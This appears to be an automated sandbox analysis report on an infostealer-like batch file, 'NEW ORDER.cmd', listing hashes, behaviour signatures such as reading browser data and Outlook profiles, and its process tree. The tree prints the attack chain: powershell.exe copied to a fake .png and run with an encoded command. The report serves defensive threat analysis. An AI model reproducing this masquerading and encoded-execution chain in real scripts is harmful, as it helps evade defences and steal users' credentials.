Analysis

  • max time kernel
    142s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-10-2023 20:46

General

  • Target

    NEW ORDER.cmd

  • Size

    1.7MB

  • MD5

    546a223f6646e33809e9b2ef29df5c46

  • SHA1

    a754082ee814e7dc4d33e16f68972e4cd969f4a2

  • SHA256

    473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299

  • SHA512

    d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749

  • SSDEEP

    24576:NNn9wdn6DtyQBpICuGreBd8qohFj3DlF5mVoUBAKDHlhuQYTEddFqwuaA/BliTUM:T2td0esLhF5GHlwQN6wJWKExlq

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
        PID:5096
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ysrph.png
        3⤵
        PID:3344
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
        PID:2624
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd" C:\Users\Admin\AppData\Local\Temp\Ysrph.png.bat
        3⤵
        PID:5088
      • C:\Users\Admin\AppData\Local\Temp\Ysrph.png
        C:\Users\Admin\AppData\Local\Temp\Ysrph.png -win 1 -enc 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
        3⤵
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:4584

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\Ysrph.png

    Filesize
    442KB

    MD5
    04029e121a0cfa5991749937dd22a1d9

    SHA1
    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256
    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512
    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Local\Temp\Ysrph.png.bat

    Filesize
    1.7MB

    MD5
    546a223f6646e33809e9b2ef29df5c46

    SHA1
    a754082ee814e7dc4d33e16f68972e4cd969f4a2

    SHA256
    473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299

    SHA512
    d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itmvms1m.cj5.ps1

    Filesize
    60B

    MD5
    d17fe0a3f47be24a6453e9ef58c94641

    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
